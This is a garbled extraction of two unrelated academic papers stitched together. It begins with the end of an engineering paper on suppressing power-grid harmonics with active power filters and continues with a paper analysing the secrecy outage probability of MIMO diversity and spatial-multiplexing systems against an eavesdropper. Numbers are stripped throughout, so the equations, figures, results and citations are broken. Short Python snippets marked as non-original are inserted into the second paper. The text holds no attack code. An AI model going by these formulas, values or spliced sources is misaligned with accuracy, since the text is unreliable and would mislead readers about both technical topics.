of leapf - . 
active power filter installed into two sets of ups respectively. ) verification: after installation and debugging, voltage, current waveform and harmonic analysis of the power supply and distribution system are tested on the spot, and data before and after the power harmonic control and suppression are shown in figure and figure . harmonic pollution is slight international journal of advanced network, monitoring and controls volume , no. , a) voltage and current waveform-before b) voltage and current waveform-after c) voltage harmonic analysis-before d) voltage harmonic analysis-after figure . voltage waveform and harmonic analysis before and after power harmonic governance and suppression a) current rms and waveform-before b) current rms and waveform-after c) current harmonics analysis-before d) current harmonics analysis-after figure . current waveform and harmonic analysis before and after power harmonic governance and suppression international journal of advanced network, monitoring and controls volume , no. , it can be seen from figure figure that after harmonic control and suppression, the total harmonic distortion rate of the power supply and distribution system is reduced to . %; the total harmonic distortion rate of current is reduced to . %; the temperature in output-end cable of the transformer is degree centigrade when room temperature is degree centigrade; the cable vibration and electronic equipment interference are eliminated. [ - ] after field tests and function verifications, the solution above turns out to be reasonable and achieves the intended goals. vi. conclusion based on the harmonic voltage limit and harmonic current allowable value regulated in the utility grid national standard gb/t - utility grid harmonic power quality, a model selection scheme for the power harmonic governance and suppression of urban utility grid is established after theoretical and experimental studies on the causes, hazards as well as the governance and suppression technology. by using technological upgrading projects as engineering case, this paper proposes a solution that uses active power filter (apf) as the core device. after field test and functional verification, the scheme proves to be both reasonable and practical. it is a reference for the power supply and distribution system design of urban utility grid. references [ ] gb/t - , quality of electric energy supply harmonics in public supply network [s]. [ ] pan zhaodong. design of single-phase harmonic control system in mine [j]. industrial and mining automation, . . [ ] chen xuemei. analysis and management of frequency conversion harmonics of low voltage power grid in oil field [j] .electrical applications, . . [ ] li lanfang. harmonic analysis and hazard management of coal mine variable frequency speed control system [j] .science and technology of coal, . . [ ] li honghui. research on harmonic management of coal mine dc hoist system [j] .coal project engineering, . . [ ] zhang zhicheng. research on harmonic management method of isolated island micro - grid [j] .power electronics technology, . . [ ] jiang youhua. decoupling and stability optimization of multi-harmonic source control system with tree distribution [j] .the grid technology, . . [ ] ge shaoyun. an empirical method for harmonic loss reduction of distribution network [j] .journal of electrical systems and automation, . . [ ] wang huiwu. power harmonic detection and estimation based on nonlinear theory [j] .electrical measurement and meter, . . [ ] li demin. 
power harmonic analysis based on fft interpolation of four spectral lines of the nuttall window [j]. power system protection and control, . . [ ] chen dongyi. new parallel active power filter with current control [j]. experimental technology and management, . . [ ] zheng kang. discussion and application of harmonic waves and their control technology in mine power supply and distribution systems [j]. the information of power, . . [ ] sun yunfei. research and application of harmonic control technology in jiao-jia gold mine [j]. electric power energy saving, . . [ ] zhang jingwei. power quality control of the power supply and distribution system in a metallurgical plant [j]. water conservancy and power industry, . . [ ] zhao yuman. research on harmonic suppression and reactive power compensation in power systems [d]. liaoning university of technology, . .

submitted december, accepted march, published april
corresponding author: kiattisak maichalernnukul, kiattisak.m@rsu.ac.th
academic editor: shlomi dolev
additional information and declarations can be found on page
doi . /peerj-cs.
copyright maichalernnukul, distributed under creative commons cc-by, open access

on the secrecy performance of transmit-receive diversity and spatial multiplexing systems

kiattisak maichalernnukul, college of digital innovation and information technology, rangsit university, pathum thani, thailand

abstract emerging from the information-theoretic characterization of secrecy, physical-layer security exploits the physical properties of the wireless channel for security purposes. in recent years, a great deal of attention has been paid to investigating physical-layer security issues in multiple-input multiple-output (mimo) wireless communications. this paper analyzes the secrecy performance of a transmit-receive diversity system and of spatial multiplexing systems with zero-forcing equalization and minimum mean-square-error equalization. specifically, exact and asymptotic closed-form expressions are derived for the secrecy outage probability of such mimo systems in a rayleigh fading environment, and the corresponding secrecy diversity orders and secrecy array gains are determined. numerical results are presented to corroborate the analytical results and to examine the impact of various system parameters, including the numbers of antennas at the transmitter, the legitimate receiver, and the eavesdropper. these contributions bring about valuable insights into physical-layer security in mimo wireless systems.

subjects computer networks and communications, security and privacy
keywords physical-layer security, secrecy outage probability, transmit-receive diversity, multiple-input multiple-output, spatial multiplexing

introduction

wireless communication systems are intrinsically prone to eavesdropping because of the open nature of the wireless medium. in this context, physical-layer security arising from the information-theoretic analysis of secrecy has attracted a lot of interest so far. this approach takes advantage of the physical characteristics of the radio channel to support secure communications. groundbreaking works on physical-layer security (wyner, ; csiszár & körner, ; leung-yan-cheong & hellman, ; bloch et al., ) focused on a basic wiretap channel, where the transmitter, the legitimate receiver, and the eavesdropper each possess a single antenna, and established the so-called secrecy capacity; a simple illustration of this quantity is sketched below.
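as a quick illustrative aside (not part of the original paper), the python snippet below evaluates the instantaneous secrecy capacity for given receiver and eavesdropper snrs, using the standard expression that the paper formalizes later in eq. (1); the snr values in the example are arbitrary assumptions.

```python
import numpy as np

def secrecy_capacity(snr_r, snr_e):
    """instantaneous secrecy capacity in bit/s/hz.

    snr_r : instantaneous snr at the legitimate receiver (linear scale)
    snr_e : instantaneous snr at the eavesdropper (linear scale)
    """
    cs = np.log2(1.0 + snr_r) - np.log2(1.0 + snr_e)
    return max(cs, 0.0)  # zero whenever the eavesdropper's snr is at least as large

# example with assumed snrs of 10 db at the receiver and 0 db at the eavesdropper
print(secrecy_capacity(10.0, 1.0))  # about 2.46 bit/s/hz
```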
one of their common remarks was that to have a positive secrecy capacity, the channel quality of the transmitter–receiver link has to be better than that of the transmitter-eavesdropper link. stimulated by advances in multiple-antenna technology for wireless communications, the physical-layer security issues in multiple-input multiple-output (mimo) wiretap how to cite this article maichalernnukul k. . on the secrecy performance of transmit-receive diversity and spatial multiplexing sys- tems. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:kiattisak.m@rsu.ac.th mailto:kiattisak.m@rsu.ac.th https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. in our context, a mimo wiretap channel implies that there are multiple antennas at the transmitter, the legitimate receiver, and the eavesdropper. this is generally known as co-located mimo. for a discussion on its alternative, called distributed or cooperative mimo, readers are referred to (dong et al., ; he, man & wang, ; zou, wang & shen, ; wang et al., a). for this kind of channel, the channel gains are allowed to change from channel use to channel use (poor & schaefer, ). channels have been recently explored in the literature (goel & negi, ; khisti & wornell, ; oggier & hassibi, ; mukherjee & swindlehurst, ; yang et al., ; ferdinand, da costa & latva-aho, ; lin, tsai & lin, ; wang, wang & ng, ; schaefer & loyka, ; wang et al., b; maichalernnukul, ). a brief overview of these works is provided in the following subsection. related works in khisti & wornell ( ), a closed-form expression for the secrecy capacity of the gaussian mimo wiretap channel was derived from solving a minimax problem. meanwhile, the problem of computing the perfect secrecy capacity of such a channel was analytically investigated in oggier & hassibi ( ). by relaxing the assumption of perfect channel state information (csi) used in khisti & wornell ( ), oggier & hassibi ( ), schaefer & loyka ( ) studied the secrecy capacity of the compound gaussian mimo wiretap channel. in mukherjee & swindlehurst ( ), a few beamforming schemes were proposed to improve the secrecy capacity of the gaussian mimo wiretap channel in the presence of csi errors. with the objective of achieving perfect secrecy at the physical layer, mimo precoding and postcoding designs using the signal-to-noise ratio (snr) criterion were presented in lin, tsai & lin ( ). in all aforementioned works, the channel was assumed to be fixed over the whole transmission time. more precisely, the channel gains for the gaussian mimo wiretap channel are constant. this is rarely practical for the wireless medium as multipath propagation normally makes transmission conditions vary with time (poor & schaefer, ). such variation is called fading. in (yang et al., ; ferdinand, da costa & latva- aho, ; maichalernnukul, ), the secrecy capacity of the fading mimo wiretap channel was characterized. specifically, yang et al. ( ) focused on the physical-layer security enhancement through transmit antenna selection in a flat-fading mimo channel, and characterized the corresponding performance in terms of the secrecy outage probability and the probability of non-zero secrecy capacity. 
in the meantime, ferdinand, da costa & latva-aho ( ) analyzed the secrecy outage probability of orthogonal space–time block code (ostbc) mimo systems when the transmitter–receiver and transmitter- eavesdropper links experience different kinds of fading. in contrast to space–time coding (which is based on transmit diversity), transmit beamforming and receive combining (which is based on transmit-receive diversity) achieve additional array gain (tse & viswanath, ). besides, goel & negi ( ) showed that multiple transmit antennas can be deployed to generate artificial noise, such that only the transmitter-eavesdropper link is degraded. this idea enables secret communication (csiszár & körner, ) and has been extended to more practical mimo scenarios, e.g., frequency-division duplex systems (wang, wang & ng, ) and heterogeneous cellular networks (wang et al., b). more recently, in maichalernnukul ( ), the average secrecy capacity of transmit- receive diversity systems in the fading mimo wiretap channel and its upper bound were derived in closed form. nevertheless, the corresponding secrecy outage probability has not been investigated yet. there are two reasons why we should study this performance. first, maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the rationale for using these ‘‘classical’’ detection techniques for the spatial multiplexing mimo systems is twofold. first, the zf and mmse detectors are the basic building blocks of advanced mimo communication architectures (e.g., layered space–time architectures (foschini, ; seethaler, artés & hlawatsch, ) and joint transmit-receive equalizers (palomar & lagunas, ; jiang, li & hager, )), and have been extensively addressed in the mimo literature (jankiraman, ; biglieri et al., ; heath jr & lozano, ). second, they have low computational complexity compared to the (optimum) maximum likelihood (ml) detector, and their performance can be very close to the ml performance for a well-conditioned mimo channel, i.e., its condition number is near to unity (see seethaler, artés & hlawatsch ( ) for more details). the closed-form results of maichalernnukul ( ) are complicated, and from these results, it is not clear how the system parameters (e.g., the numbers of antennas at the transmitter, the legitimate receiver, and the eavesdropper) affect the secrecy performance. in fact, quantifying the secrecy outage probability at high snr in terms of two parameters, namely secrecy diversity order and secrecy array gain, can provide insights into this effect (yang et al., ). second, it was shown in bashar, ding & li ( ) that although transmit beamforming in the transmit-receive diversity systems maximizes the achievable capacity of the main channel (i.e., that for the transmitter–receiver link), they still have secrecy outages at an arbitrary target secrecy rate. the first objective of our work is to present the exact and asymptotic (high-snr) analysis of the secrecy outage probability of these systems. it is well known that the multiple antennas of mimo systems can be exploited to obtain spatial multiplexing, i.e., transmission of independent data streams in parallel (tse & viswanath, ). this leads to an increase in the data rate. 
while several key performance metrics of spatial multiplexing mimo systems, e.g., error probability, outage and ergodic capacity, have been extensively studied in the literature (chen & wang, ; smith, ; ordóñez et al., ; kumar, caire & moustakas, ; jiang, varanasi & li, ), little is known about the secrecy performance of these systems in the fading mimo wiretap channel. the second objective of our work is to fill this knowledge gap by providing a relevant secrecy outage probability characterization. contributions the main contributions of this work are summarized as follows: • we derive exact and asymptotic closed-form expressions for the secrecy outage probability of a transmit-receive diversity system in the fading mimo wiretap channel. we also do the same for the secrecy outage probability of spatial multiplexing systems with linear equalization, especially zero-forcing (zf) and minimum mean-square-error (mmse). it is shown that all exact secrecy outage results simplify to the well-known result (bloch et al., , equation ( )) for the case where the transmitter, the legitimate receiver, and the eavesdropper have a single antenna. • we determine the secrecy diversity order and secrecy array gain that the above systems achieve, and discuss the impact of the numbers of antennas at the transmitter, the legitimate receiver, and the eavesdropper, denoted as mt, mr, and me, respectively, on the system secrecy and complexity. through numerical results, it is verified that the transmit-receive diversity system attains a secrecy diversity order of mtmr, while the spatial multiplexing systems with zf equalization and mmse equalization yield the same secrecy diversity order of mr−mt+ . all of these secrecy diversity orders turn out to be independent of me. notation and organization throughout this paper, we write a function g(x) of variable x as o(x) if limx→ g(x) x = , and denote ( · · ) as the multinomial coefficient, e[·] as the expectation operator, ddx (·) as the first derivative operator with respect to variable x, ‖·‖ as the euclidean norm of a vector, and in as the identity matrix of size n ×n . moreover, det(·), (·)t, (·)†, (·)− , and [·]ij maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this assumption holds, for example, if the receiver and eavesdropper are able to perfectly estimate hr and he, respectively, and the receiver sends hr to the transmitter through a noiseless broadcast channel, which can be heard by the eavesdropper (goel & negi, ). denote the determinant, transpose, conjugate transpose, inverse, and (i,j)-th element of a matrix, respectively, and ϒ(·,·) and (·,·) are the lower and upper incomplete gamma functions defined in (gradshteyn & ryzhik, , equation ( . . )) and (gradshteyn & ryzhik, , equation ( . . )), respectively. we also denote cn( ,k) as a zero-mean circularly-symmetric complex gaussian distribution with covariance k (gallager, , section . . ), and lmax{·} and p{·} as the largest eigenvalue of a square matrix and the associated eigenvector, respectively. the layout of the paper is as follows. ‘system model’ describes the system model of interest. ‘exact secrecy outage probability’ and ‘asymptotic secrecy outage probability’ present exact and asymptotic analysis of the corresponding secrecy outage probability, respectively. ‘numerical results’ provides the numerical results of theoretical analysis and simulations, followed by the conclusion given in ‘conclusion’. 
system model in this section, we consider transmit-receive diversity and spatial multiplexing systems where the transmitter, the legitimate receiver, and the passive eavesdropper are equipped with mt, mr, and me antennas, respectively. the instantaneous secrecy capacity of these systems is given by (bloch et al., , lemma ) cs= {log ( +γr)−log ( +γe), if γr >γe , if γr≤γe ( ) where γr and γe are the instantaneous received snrs at the receiver and the eavesdropper, respectively. transmit-receive diversity system for the transmit-receive diversity system, the received signal vector at the legitimate receiver, yr ∈cmr× , and that at the passive eavesdropper, ye ∈cme× , depend on the transmitted symbol s∈c (with e[|s| ]=p) according to yr=hrwts+nr ( ) and ye=hewts+ne ( ) respectively, where wt∈cmt× is the transmit weight (beamforming) vector, and nr and ne are independent circularly-symmetric complex-valued gaussian noises: nr∼cn( ,σ r imr) and ne∼cn( ,σ e ime). we focus on a rayleigh-fading wiretap channel, meaning that the channel matrices hr and he have independent identically-distributed cn( , ) entries. in addition, we assume that the three terminals know hr, but he is available only at the eavesdropper. the receiver estimates the symbol s by applying the receive weight (combining) vector zr to the received signal vector yr: z†ryr=z † rhrwts+z † rnr. maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the optimal choices of wt and zr in the sense of maximizing the snr of this estimate (i.e., the instantaneous received snr) are given by dighe, mallik & jamuar ( ) wt= h†rzr ‖h†rzr‖ and zr=p{hrh†r} respectively, and the resultant snr is γr,tr= γ̄rlmax{hrh†r} ( ) where γ̄r = p σ r is the average snr at the receiver. the subscript tr refers to the transmit-receive diversity system, and is sometimes used to avoid confusion between this system and the spatial multiplexing system. let λ=lmax{hrh † r}, l=min(mt,mr), and k =max(mt,mr). the cumulative distribution function (cdf) of λ is given by dighe, mallik & jamuar ( ) fλ(x)= det(s(x))[∏l p= (k −p)!(l−p)! ] ( ) where s(x) is the l×l hankel matrix with [s(x)]ij =ϒ(|mt−mr|+i+j− ,x). by careful inspection of the entries of s(x), this cdf can be rewritten as fλ(x)= l∑ m= (mt+mr− m)m∑ n=|mt−mr| am,n n! ϒ(n+ ,mx) ( ) where am,n = cm,nn! mn+ [∏l p= (k−p)!(l−p)! ] and cm,n is the coefficient computed by using curve fitting on the plot of ddx det(s(x)) (dighe, mallik & jamuar, ). using eq. ( ) and (papoulis & pillai, , example - ), the cdf of γr,tr in eq. ( ) is given by fγr,tr(x)= l∑ m= (mt+mr− m)m∑ n=|mt−mr| am,n n! ϒ ( n+ , mx γ̄r ) . ( ) similarly, the eavesdropper can estimate the symbol s as z†eye=z † ehewts+z † ene where the receive weight vector ze= hewt ‖hewt‖ is chosen to maximize the snr of the estimate, yielding γe,tr= γ̄e‖hewt‖ ( ) maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where γ̄e = p σ e is the average snr at the eavesdropper. the probability density function (pdf) of γe,tr in eq. ( ) is given by maichalernnukul ( ) fγe,tr(x)= xme− e− x γ̄e (me− )!γ̄ me e . ( ) spatial multiplexing system unlike the transmit-receive diversity system, the spatial multiplexing system allows the simultaneous transmission of different symbols, i.e., the ith antenna (i= , ,...,mt) at the transmitter is used to transmit the symbol si∈c (with e[|si| ]=p) . let s=[s ,s ,...,smt]t. 
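to make the transmit-receive diversity model concrete, here is a small numpy sketch (illustrative only; the antenna numbers, average snr and random seed are assumptions) that applies the maximum-snr weight vectors specified in the next paragraph — the receive combiner is the principal eigenvector of hr hr† and the transmit beamformer is the matched, normalized vector — and checks numerically that the resulting snr equals γ̄r·lmax{hr hr†}, as stated in eq. (4).

```python
import numpy as np

rng = np.random.default_rng(0)
mt, mr, snr_avg = 4, 2, 10.0   # assumed antenna numbers and average receiver snr (linear)

# rayleigh-fading channel: i.i.d. circularly-symmetric complex gaussian entries
hr = (rng.standard_normal((mr, mt)) + 1j * rng.standard_normal((mr, mt))) / np.sqrt(2)

# receive combiner: principal eigenvector of hr hr^H
eigvals, eigvecs = np.linalg.eigh(hr @ hr.conj().T)
zr = eigvecs[:, -1]                      # eigenvector of the largest eigenvalue

# transmit beamformer matched to the combined channel, normalized to unit norm
wt = hr.conj().T @ zr
wt = wt / np.linalg.norm(wt)

# effective scalar channel gain and resulting snr: equals snr_avg * lambda_max
gain = np.abs(zr.conj() @ hr @ wt) ** 2
print(snr_avg * gain, snr_avg * eigvals[-1])   # the two values coincide
```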
the received signal vectors at the legitimate receiver and the passive eavesdropper are given, respectively, by yr=hrs+nr where hr and nr are defined in eq. ( ), and ye=hes+ne where he and ne are defined in eq. ( ). we assume that the receiver and the eavesdropper know hr and he, respectively, and the numbers of antennas at these two terminals (mr and me) are no less than the number of antennas at the transmitter (mt). the assumption on mt, mr, and me is necessary for the theoretical analysis hereafter. in order for the receiver to estimate s, the zf or mmse receive weight (equalizing) matrix is applied to yr. these matrices are given by tse & viswanath ( ) wr,zf= ( h†rhr )− h†r and wr,mmse= ( h†rhr+ γ̄r imt )− h†r. it is noteworthy that as the average snr at the receiver grows very large, i.e., γ̄r →∞, wr,mmse approaches wr,zf. left multiplying yr by wr,zf and wr,mmse, we obtain the ith symbol estimate (i= , ,...,mt), the snrs of which are, respectively, (jiang, varanasi & li, ) γr,zf,i= γ̄r[( h†rhr )− ] ii ( ) and γr,mmse,i= γ̄r[( h†rhr+ γ̄r imt )− ] ii − . ( ) the cdfs of γr,zf,i and γr,mmse,i are given, respectively, by chen & wang ( ) fγr,zf(x)= −e − x γ̄r mr−mt∑ m= xm m!γ̄mr ( ) maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and smith ( ) fγr,mmse(x)= − e− x γ̄r (x+ )mt− mr− ∑ m= dmx m ( ) where dm= ∑m n=max( ,m−mt+ ) (mt− m−n ) n!γ̄nr . the symbol index i is omitted from eqs. ( ) and ( ) because all the elements of hr are statistically independent and identically distributed. similarly, the eavesdropper performs zf or mmse equalization, and the resulting snrs of the ith symbol estimate (i.e., γe,zf,i and γe,mmse,i) can be expressed, respectively, as eqs. ( ) and ( ) with the subscript r being replaced by the subscript e. replacing the subscript r with the subscript e in eqs. ( ) and ( ), and taking the derivative of these equations with respect to x, we obtain the pdfs for γe,zf,i and γe,mmse,i, respectively, as fγe,zf(x)= xme−mte− x γ̄e (me−mt)!γ̄ me−mt+ e ( ) and fγe,mmse(x)= e− x γ̄e (x+ )mt me− ∑ m= gm [ xm+ γ̄e + ( mt+ γ̄e −m− ) xm−mxm− ] ( ) where gm is similar to dm, except that the subscript r is replaced by the subscript e. exact secrecy outage probability the secrecy outage probability is defined as the probability that the instantaneous secrecy capacity is less than a target secrecy rate r > (bloch et al., ). from eq. ( ), this performance metric can be expressed as pout(r)=pr{cs <r} =pr { γr < r γe+ r − } = ∫ ∞ fγe(v)fγr ( rv+ r− ) dv. ( ) transmit-receive diversity system from eqs. ( ), ( ) and ( ), we can derive the exact secrecy outage probability for the transmit-receive diversity system as follows: pout,tr(r)= (me− )!γ̄ me e l∑ m= (mt+mr− m)m∑ n=|mt−mr| am,n n! ∫ ∞ vme− e− v γ̄e ×ϒ ( n+ , ( rv+ r− )m γ̄r ) dv = (me− )!γ̄ me e l∑ m= (mt+mr− m)m∑ n=|mt−mr| am,n [∫ ∞ vme− e− v γ̄e dv −e− ( r− )m γ̄r n∑ k= ( m γ̄r )k k∑ l= lr( r− )k−l l!(k−l)! ∫ ∞ vl+me− e − ( rm γ̄r + γ̄e ) v dv ] maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. = − (me− )!γ̄ me e l∑ m= (mt+mr− m)m∑ n=|mt−mr| am,ne − ( r− )m γ̄r n∑ k= ( m γ̄r )k × k∑ l= (l+me− )! lr( r− )k−l l!(k−l)! ( rm γ̄r + γ̄e )l+me ( ) where the second equality is obtained by using (gradshteyn & ryzhik, , equations ( . ) and ( . . )), and the last equality is obtained by using (gradshteyn & ryzhik, , equation ( . . )) and (maaref & aïssa, , equation ( )). 
for the special case of mt=mr=me= , the secrecy outage probability expression in eq. ( ) reduces to pout,tr(r)= − γ̄re − r− γ̄r γ̄r+ rγ̄e ( ) which agrees exactly with a result given in (bloch et al., , equation ( )). spatial multiplexing system from eqs. ( ), ( ) and ( ), we can derive the exact secrecy outage probability for the spatial multiplexing system with zf equalization as follows: pout,zf(r)= ∫ ∞ fγe,zf(v)dv− e− r− γ̄r (me−mt)!γ̄ me−mt+ e mr−mt∑ m= m!γ̄mr × ∫ ∞ ( rv+ r− )mvme−mte − ( r γ̄r + γ̄e ) v dv = − e− r− γ̄r (me−mt)!γ̄ me−mt+ e mr−mt∑ m= γ̄mr m∑ n= nr( r− )m−n n!(m−n)! × ∫ ∞ vn+me−mte − ( r γ̄r + γ̄e ) v dv = − e− r− γ̄r (me−mt)! ( rγ̄e γ̄r + )me−mt+ × mr−mt∑ m= γ̄mr m∑ n= nr( r− )m−n(n+me−mt)! n!(m−n)! ( r γ̄r + γ̄e )n ( ) where the second equality is obtained by using (gradshteyn & ryzhik, , equation ( . )) and (papoulis & pillai, , equation ( - )), and the last equality is obtained by using (gradshteyn & ryzhik, , equation ( . . )). for the special case of mt=mr=me= , eq. ( ) simplifies to eq. ( ). meanwhile, the secrecy outage probability for the spatial multiplexing system with mmse equalization can be derived from eqs. ( ), ( ) and ( ) as follows: maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. pout,mmse(r)= ∫ ∞ fγe,mmse(v)dv− e− r− γ̄r (mt− )r me− ∑ m= gm mr− ∑ n= dn × [∫ ∞ ( rv+ r− )ne − ( r γ̄r + γ̄e ) v (v+ ) mt− × [vm+ γ̄e + ( mt+ γ̄e −m− ) vm−mvm− ] dv ] = − e γ̄r + γ̄e (mt− )r me− ∑ m= gm mr− ∑ n= dn n∑ k= ( n k ) (− )k (n−k)r × [ γ̄e m+ ∑ l = ( m+ l ) (− )l ∫ ∞ vm+n−k−l − mt+ e − ( r γ̄r + γ̄e ) v dv + ( mt+ γ̄e −m− ) m∑ l = ( m l ) (− )l ∫ ∞ vm+n−k−l − mt+ e − ( r γ̄r + γ̄e ) v dv +m m− ∑ l = ( m− l ) (− )l ∫ ∞ vm+n−k−l − mte − ( r γ̄r + γ̄e ) v dv ] = − e γ̄r + γ̄e (mt− )r me− ∑ m= gm mr− ∑ n= dn n∑ k= ( n k ) (− )k (n−k)r × [ γ̄e m+ ∑ l = ( m+ l )(− )l (m+n−k−l − mt+ , rγ̄r + γ̄e )( r γ̄r + γ̄e )m+n−k−l − mt+ + ( mt+ γ̄e −m− ) m∑ l = ( m l )(− )l (m+n−k−l − mt+ , rγ̄r + γ̄e )( r γ̄r + γ̄e )m+n−k−l − mt+ +m m− ∑ l = ( m− l )(− )l (m+n−k−l − mt+ , rγ̄r + γ̄e )( r γ̄r + γ̄e )m+n−k−l − mt+ ] ( ) where the second equality is obtained by changing the limits of integration and using (gradshteyn & ryzhik, , equation ( . )) and (papoulis & pillai, , equation ( - )), and the last equality is obtained by using (gradshteyn & ryzhik, , equation ( . . )). for the special case of mt=mr=me= , eq. ( ) reduces to eq. ( ). asymptotic secrecy outage probability in this section, we focus on deriving the asymptotic secrecy outage probability of the aforementioned systems as γ̄r →∞. this expression enables one to analyze the secrecy performance in the high-snr regime through two performance indicators: secrecy diversity order and secrecy array gain (yang et al., ). the secrecy diversity order indicates the slope of the secrecy outage probability versus γ̄r curve at high snr in a log–log scale, whereas maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the secrecy array gain indicates the shift of the curve with respect to the benchmark secrecy outage curve. transmit-receive diversity system first, we look for a first-order expansion of eq. ( ), which will be immediate from a first-order expansion of det(s(x)). following the approach outlined in (mckay, , appendix b. ) and using (kalman, , equations ( ) and ( )), it is straightforward to show that the first-order taylor expansion of det(s(x)) around x = is det(s(x))= [ l∏ p= (k −p)![(l−p)!] (mt+mr−p)! 
] xmtmr+o ( xmtmr ) . ( ) substituting eq. ( ) into eq. ( ) yields fλ(x)= [ l∏ p= (l−p)! (mt+mr−p)! ] xmtmr+o ( xmtmr ) . ( ) using eq. ( ) and (papoulis & pillai, , example - ), the first-order expansion of the cdf of γr,tr is given by fγr,tr(x)= [ l∏ p= (l−p)! (mt+mr−p)! ]( x γ̄r )mtmr +o (( x γ̄r )mtmr) . ( ) using eqs. ( ), ( ) and ( ), and following the same procedure as used in eq. ( ), an asymptotic expression for pout,tr(r) with γ̄r→∞ is obtained as p∞out,tr(r)=(atrγ̄r) −dtr+o ( γ̄ −dtr r ) ( ) where the secrecy diversity gain is dtr=mtmr ( ) and the secrecy array gain is atr = [ (me− )! [ l∏ p= (l−p)! (mt+mr−p)! ]mtmr∑ n= ( mtmr n ) ×(n+me− )! nr( r− )mtmr−nγ̄ne ]− mtmr . ( ) it is clear from eq. ( ) that the secrecy diversity order is dependent on mt and mr, and independent of me. it can also be seen from eq. ( ) that the eavesdropper channel has an adverse impact on the secrecy array gain. accordingly, increasing the number of antennas at the eavesdropper lessens the secrecy array gain, thereby rising the secrecy outage probability. spatial multiplexing system applying (gradshteyn & ryzhik, , equation ( . . )) to the exponential function in eq. ( ) and performing some algebraic manipulations, the first-order expansion of the maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. cdf of γr,zf,i can be derived as fγr,zf(x)= xmr−mt+ (mr−mt+ )!γ̄ mr−mt+ r +o (( x γ̄r )mr−mt+ ) . ( ) using eqs. ( ), ( ) and ( ), and following the same procedure as used in eq. ( ), an asymptotic expression for pout,zf(r) with γ̄r→∞ is obtained as p∞out,zf(r)=(azfγ̄r) −dzf+o ( γ̄ −dzf r ) ( ) where dzf=mr−mt+ ( ) and azf= [∑mr−mt+ n= (mr−mt+ n ) nr( r− )mr−mt+ −n(n+me−mt)!γ̄ne (mr−mt+ )!(me−mt)! ]− mr−mt+ . ( ) adopting the same steps as for deriving the first-order expansion of fγr,zf(x), we obtain fγr,mmse(x)= xmr (mr−mt+ )!γ̄ mr−mt+ r (x+ )mt− +o (( x γ̄r )mr−mt+ ) . ( ) using eqs. ( ), ( ) and ( ), and following the same procedure as used in eq. ( ), an asymptotic expression for pout,mmse(r) with γ̄r→∞ is obtained as p∞out,mmse(r)=(ammseγ̄r) −dmmse+o ( γ̄ −dmmse r ) ( ) where dmmse=mr−mt+ ( ) and ammse = [ e γ̄e (mr−mt+ )r (mr−mt+ )! me− ∑ m= gm mr∑ n= ( mr n ) (− )nγ̄m−n+mr− mt+ e nr × [ γ̄e m+ ∑ k = ( m+ k )( − γ̄e )k ( m−n−k +mr− mt+ , γ̄e ) +γ̄e ( mt+ γ̄e −m− ) m∑ k = ( m k )( − γ̄e )k ( m−n−k +mr− mt+ , γ̄e ) −m m− ∑ k = ( m− k )( − γ̄e )k ( m−n−k +mr− mt+ , γ̄e )]]− mr−mt+ . ( ) it is obvious from eqs. ( ) and ( ) that the secrecy diversity orders of the spatial multiplexing systems with zf equalization and mmse equalization are dependent on mt and mr, and independent of me. it can also be observed from eqs. ( ) and ( ) that increasing me decreases the corresponding secrecy array gains. maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. average snr at the receiver (db) - - - - - - - - s e cr e cy o u ta g e p ro b a b ili ty m t = , m r = , m e = m t = , m r = , m e = (simu.) m t = , m r = , m e = m t = , m r = , m e = (simu.) m t = , m r = , m e = m t = , m r = , m e = (simu.) m t = , m r = , m e = m t = , m r = , m e = (simu.) figure secrecy outage probability of transmit-receive diversity system (pout,tr) as a function of γ̄r. this figure shows the theoretical and simulated secrecy outage curves for the transmit-receive diversity system with different numbers of antennas at the transmitter (mt), the legitimate receiver (mr), and the eavesdropper (me). 
the simulation results are labeled with ‘‘simu.’’. full-size doi: . /peerjcs. /fig- numerical results in this section, we validate the preceding theoretical analysis and investigate the effect of the various system parameters. for these purposes, theoretical and simulation results are obtained by using matlab. specifically, we use the closed-form expressions derived above to generate the theoretical results, and adopt the monte carlo method to generate the simulation results. remember that γ̄r and γ̄e are the average snrs at the legitimate receiver and the passive eavesdropper, respectively. unless otherwise indicated, the snr γ̄e is set to db, and the target secrecy rate r is set to bit/s/hz. figure shows the theoretical secrecy outage probability of the transmit-receive diversity system (computed with eq. ( )) and its simulation counterpart (labeled with ‘‘simu.’’) against γ̄r. as seen in the figure, the theoretical and simulation results match perfectly. for a given γ̄r, when mt+mr = and me = , the secrecy outage probability with mt = and mr = is lower than that with mt = and mr = . this is consistent with the fact that for a fixed total number of antennas at the transmitter and legitimate receiver (mt+mr), a more-balanced antenna configuration provides a larger diversity gain (dighe, mallik & jamuar, ; maaref & aïssa, ). specifically, from eq. ( ), we have dtr= for mt= and mr= , and dtr = for mt = and mr = . however, when mtmr = and me = , the secrecy outage probability with mt = and mr = is higher than that with mt = and mr = . maichalernnukul ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. − − − − − − − − average snr at the receiver (db) s ec re cy o ut ag e pr ob ab ili ty m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = m t = , m r = , m e = figure pout,tr for different combinations of mt, mr, and me. 